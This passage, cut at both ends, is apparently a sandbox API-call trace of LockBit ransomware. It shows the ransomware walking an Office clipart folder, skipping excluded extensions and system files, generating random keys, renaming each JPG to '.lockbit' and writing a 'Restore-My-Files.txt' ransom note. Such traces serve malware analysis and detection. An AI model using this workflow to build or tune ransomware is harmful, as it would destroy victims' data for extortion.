lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.386] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.386] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.388] free (_Block=0x1fa2ed8) [0147.388] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.388] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.388] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.388] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd902, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0177806.JPG", cAlternateFileName="")) returned 1 [0147.388] lstrcmpiW (lpString1=".", lpString2="J0177806.JPG") returned -1 [0147.388] lstrcmpiW (lpString1="..", lpString2="J0177806.JPG") returned -1 [0147.388] PathFindExtensionW (pszPath="J0177806.JPG") returned=".JPG" [0147.388] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.388] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.388] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.388] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.388] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.388] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.388] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.388] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.388] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.389] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.389] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.390] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.390] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.390] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.390] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.390] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.390] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.390] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0177806.JPG") returned 1 [0147.390] lstrcmpiW (lpString1="ntldr", lpString2="J0177806.JPG") returned 1 [0147.390] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0177806.JPG") returned 1 [0147.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0177806.JPG") returned -1 [0147.390] lstrcmpiW (lpString1="autorun.inf", lpString2="J0177806.JPG") returned -1 [0147.390] lstrcmpiW (lpString1="thumbs.db", lpString2="J0177806.JPG") returned 1 [0147.391] lstrcmpiW (lpString1="iconcache.db", lpString2="J0177806.JPG") returned -1 [0147.391] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.391] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned=".JPG" [0147.391] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.391] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.391] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.391] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.391] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.391] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.392] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.392] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.lockbit") returned 72 [0147.392] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0147.396] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.396] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.396] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=55554) returned 1 [0147.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.397] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.399] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.400] malloc (_Size=0xa6) returned 0x77d7a8 [0147.400] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.401] free (_Block=0x77d7a8) [0147.401] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.401] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.401] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.401] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x907d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0178348.JPG", cAlternateFileName="")) returned 1 [0147.401] lstrcmpiW (lpString1=".", lpString2="J0178348.JPG") returned -1 [0147.401] lstrcmpiW (lpString1="..", lpString2="J0178348.JPG") returned -1 [0147.401] PathFindExtensionW (pszPath="J0178348.JPG") returned=".JPG" [0147.401] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.401] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.401] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.401] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.401] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.401] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.402] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.402] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.403] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.403] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.404] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.404] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0178348.JPG") returned 1 [0147.404] lstrcmpiW (lpString1="ntldr", lpString2="J0178348.JPG") returned 1 [0147.404] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0178348.JPG") returned 1 [0147.404] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0178348.JPG") returned -1 [0147.404] lstrcmpiW (lpString1="autorun.inf", lpString2="J0178348.JPG") returned -1 [0147.404] lstrcmpiW (lpString1="thumbs.db", lpString2="J0178348.JPG") returned 1 [0147.404] lstrcmpiW (lpString1="iconcache.db", lpString2="J0178348.JPG") returned -1 [0147.404] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.404] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned=".JPG" [0147.404] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.404] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.404] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.404] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.405] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.405] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.405] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.405] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.405] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.405] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.lockbit") returned 72 [0147.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0147.407] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.407] malloc (_Size=0x40068) returned 0x3ef0008 [0147.407] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=36989) returned 1 [0147.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.407] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0147.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0147.408] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0147.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.413] malloc (_Size=0xa6) returned 0x77d7a8 [0147.413] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.414] free (_Block=0x77d7a8) [0147.414] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.414] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.414] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.414] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7214, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0178459.JPG", cAlternateFileName="")) returned 1 [0147.414] lstrcmpiW (lpString1=".", lpString2="J0178459.JPG") returned -1 [0147.414] lstrcmpiW (lpString1="..", lpString2="J0178459.JPG") returned -1 [0147.414] PathFindExtensionW (pszPath="J0178459.JPG") returned=".JPG" [0147.414] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.415] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.415] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.416] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.416] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.417] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.417] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.417] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.417] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0178459.JPG") returned 1 [0147.417] lstrcmpiW (lpString1="ntldr", lpString2="J0178459.JPG") returned 1 [0147.417] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0178459.JPG") returned 1 [0147.417] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0178459.JPG") returned -1 [0147.417] lstrcmpiW (lpString1="autorun.inf", lpString2="J0178459.JPG") returned -1 [0147.417] lstrcmpiW (lpString1="thumbs.db", lpString2="J0178459.JPG") returned 1 [0147.417] lstrcmpiW (lpString1="iconcache.db", lpString2="J0178459.JPG") returned -1 [0147.417] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft 